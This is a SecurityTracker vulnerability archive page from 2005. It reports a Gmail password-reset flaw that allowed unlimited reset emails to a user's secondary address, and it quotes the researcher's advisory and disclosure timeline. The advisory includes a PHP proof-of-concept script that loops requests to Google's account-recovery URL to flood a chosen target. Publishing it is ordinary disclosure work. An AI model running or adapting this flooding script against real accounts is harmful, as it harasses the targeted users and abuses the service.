SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com






Category:   Application (E-mail Server)  >   GMail Vendors:   Google
Gmail 'forgot your password?' Feature Lets Remote Users Flood a User's Secondary E-mail Account
SecurityTracker Alert ID:  1012749
SecurityTracker URL:  http://securitytracker.com/id/1012749
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Jan 2 2005
Impact:   Host/resource access via network
Exploit Included:  Yes  

Description:   Joxean Koret reported a vulnerability in the Gmail service. A remote user can cause a large amount of e-mail to be sent to the target user's secondary address.

The Gmail service 'forgot your password?' feature allows a remote user to load a certain URL to cause the service to send a validation e-mail to the specified user's secondary e-mail address. There is no limit to the number of messages sent over a period of time, so a remote user can flood the target user's secondary e-mail address.

The vendor was notified on September 26, 2004.

Impact:   A remote user can cause a large amount of e-mail to be sent to the target user's secondary e-mail account.
Solution:   No solution was available at the time of this entry.
Vendor URL:  gmail.google.com/ (Links to External Site)
Cause:   Access control error, State error
Underlying OS:  

Message History:   None.


 Source Message Contents

Date:  Sat, 01 Jan 2005 20:15:14 +0000
Subject:  GMail E-Mail Bomber


---------------------------------------------------------------------------
              GMail E-Mail Bomber
---------------------------------------------------------------------------

Author: Jose Antonio Coret (Joxean Koret)
Date: 2004 
Location: Basque Country

---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

GMail - Gmail is an experiment in a new kind of webmail, built on the
idea 
that you should never have to delete mail and you should always be able
to 
find the message you want

Web : http://gmail.google.com

---------------------------------------------------------------------------

Vulnerability:
~~~~~~~~~~~~~~

A. E-Mail Bomber

The problem is the following : If any gmail user forgots the password
he/she 
can answer a question or send to her/sher secondary e-mail addresses a
password 
reset confirmation e-mail. Well, with GMail we can flood the secondary
e-mail 
box of GMail users.

I wrote a very basic Proof Of Concept in PHP : 

<?php
/******************************************
*
* GMail bomber Proof Of Concept
* Date time : Sun. Sep-26-2004
* Author : Jose Antonio Coret
* E-Mail : 
*       joxeankoret@yahoo.es
*       joxean.piti@gmail.com
*
******************************************/

$gmail_account     = "any.gmail.address@gmail.com";
$google_cgi        =
"https://www.google.com/accounts/VerifySecretAnswer";
$google_cgi_params =
"?continue=http://gmail.google.com/gmail&service=mail&Email=
$gmail_account&SendEmail=true&IdentityAnswer=";
$emails_to_send    = 15;
$bomber_url        = "$google_cgi$google_cgi_params";

        echo("GMail bomber\n");
        echo("P.O.C. provided by Jose Antonio Coret (Joxean Koret)\n
\n");
        echo("Starting flood against $gmail_account ... \n\n");

        for ($i = 0;$i<$emails_to_send;$i++)
        {
                echo("Sending e-mail number " . ($i + 1) . " ... ");
                $fd = fopen($bomber_url, "r");
                fclose($fd);
                echo("Ok.\n");
        }

        echo("\n");
        echo("Finish...\n");
?>


The fix:
~~~~~~~~

The vendor was contacted on Sun, 26 Sep 2004 21:11:55 but the problem
still 
continues unfixed at Sun, 26 Dec 2004.

Disclaimer:
~~~~~~~~~~~

The information in this advisory and any of its demonstrations is
provided
"as is" without any warranty of any kind.

I am not liable for any direct or indirect damages caused as a result of
using the information or demonstrations provided in any part of this
advisory. 

---------------------------------------------------------------------------

Contact:
~~~~~~~~

	Joxean Koret at joxeanpiti<<<<<<<<@>>>>>>>>yah00<<<<<<dot>>>>>es
 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

Copyright 2014, SecurityGlobal.net LLC